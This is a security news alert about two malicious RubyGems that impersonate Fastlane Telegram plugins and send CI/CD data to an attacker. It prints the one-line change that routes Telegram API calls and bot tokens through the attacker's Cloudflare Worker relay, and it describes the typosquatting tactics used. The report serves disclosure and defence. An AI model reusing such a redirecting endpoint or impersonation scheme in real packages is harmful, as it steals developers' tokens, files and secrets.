Alert: Malicious RubyGems Impersonate Fastlane Plugins, Steal CI/CD Data

Socket’s Threat Research Team has uncovered a targeted supply chain attack leveraging malicious RubyGems impersonating Fastlane plugins. The attackers exploited heightened demand for Telegram workarounds in Vietnam to distribute gems that secretly exfiltrate sensitive deployment data from CI/CD pipelines.

The malicious gems—fastlane-plugin-telegram-proxy and fastlane-plugin-proxy_teleram—were published by a threat actor using the Vietnamese aliases Bùi nam, buidanhnam, and si_mobile. These packages masquerade as legitimate Telegram notification tools for Fastlane, a popular automation tool in mobile app development.

At first glance, the gems appear harmless. They:

• Clone the legitimate fastlane-plugin-telegram plugin,
• Retain expected behaviors and interfaces,
• Preserve README documentation and even link to a forked GitHub repo.

But the subtle switch of a single line of code turns them malicious:

# Legitimate endpoint
uri = URI.parse("https://api.telegram.org/bot#{token}/sendMessage")

# Malicious version
uri = URI.parse("https://rough-breeze-0c37[.]buidanhnam95[.]workers[.]dev/bot#{token}/sendMessage")

“This subtle change redirects every Telegram API call through the threat actor’s relay,” Socket explains.

The threat actor’s Cloudflare Worker proxy captures:

• Telegram bot tokens
• Chat IDs and message content
• Uploaded files (e.g., logs, artifacts)
• Optional proxy credentials

“The plugin still returns valid responses from Telegram, making the behavior difficult to detect,” Socket notes. These bot tokens provide full access to victims’ Telegram bots, enabling attackers to impersonate, delete, or manipulate bot communications.

Fastlane plugins typically run inside CI/CD pipelines, handling:

• Code signing keys
• Release binaries
• Environment variables and secrets

“Because Fastlane runs inside CI/CD pipelines that handle sensitive assets… the impact reaches deep into software build and release workflows.”

The backdoored gems make no attempt to limit by region or usage context. Any developer or team using the plugin is vulnerable—regardless of geography.

To evade detection and improve search visibility, the attacker employed:

• Typosquatting (teleram instead of telegram)
• Strategic use of suffixes (-proxy)
• Linking a forked GitHub repo as the package homepage

“Search results for fastlane-plugin-telegram on RubyGems show the malicious typosquatted gem ranked alongside legitimate plugins.”

Despite clear malicious intent, both gems remain available on RubyGems at the time of this writing.

Related Posts:

• RubyGems cgi gem HTTP response splitting
• Critical TeamCity Flaws Exploited: Ransomware, Cryptominers, and More Target Businesses
• RubyGems ActiveRecord SQL Injection Vulnerability
• Malicious npm Packages Backdoor Telegram Bot Developers